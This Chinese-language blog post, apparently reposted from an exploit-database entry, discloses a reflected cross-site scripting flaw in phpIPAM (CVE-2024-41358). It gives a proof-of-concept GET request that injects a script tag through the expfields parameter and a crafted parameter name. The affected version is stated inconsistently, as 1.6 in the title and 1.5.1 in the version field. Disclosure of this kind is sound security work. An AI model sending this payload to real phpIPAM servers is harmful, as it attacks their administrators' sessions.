phpIPAM 1.6 反射型跨站脚本 (XSS) 漏洞分析与利用

本文详细分析了phpIPAM 1.6版本中存在的反射型跨站脚本(XSS)漏洞(CVE-2024-41358),提供了漏洞的技术细节、影响版本和完整的概念验证(PoC)利用代码。

漏洞标题:phpIPAM 1.6 - 反射型跨站脚本 (XSS)

日期:2025-11-25

漏洞作者:CodeSecLab

厂商主页:https://github.com/phpipam/phpipam/

软件链接:https://github.com/phpipam/phpipam/

版本:1.5.1

测试环境:Windows

CVE:CVE-2024-41358

概念验证 (PoC) 

1

GET http://phpipam/app/admin/import-export/import-devices-preview.php?&filetype=anyValidFiletype&expfields=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&importFields__%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=anyValue
comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次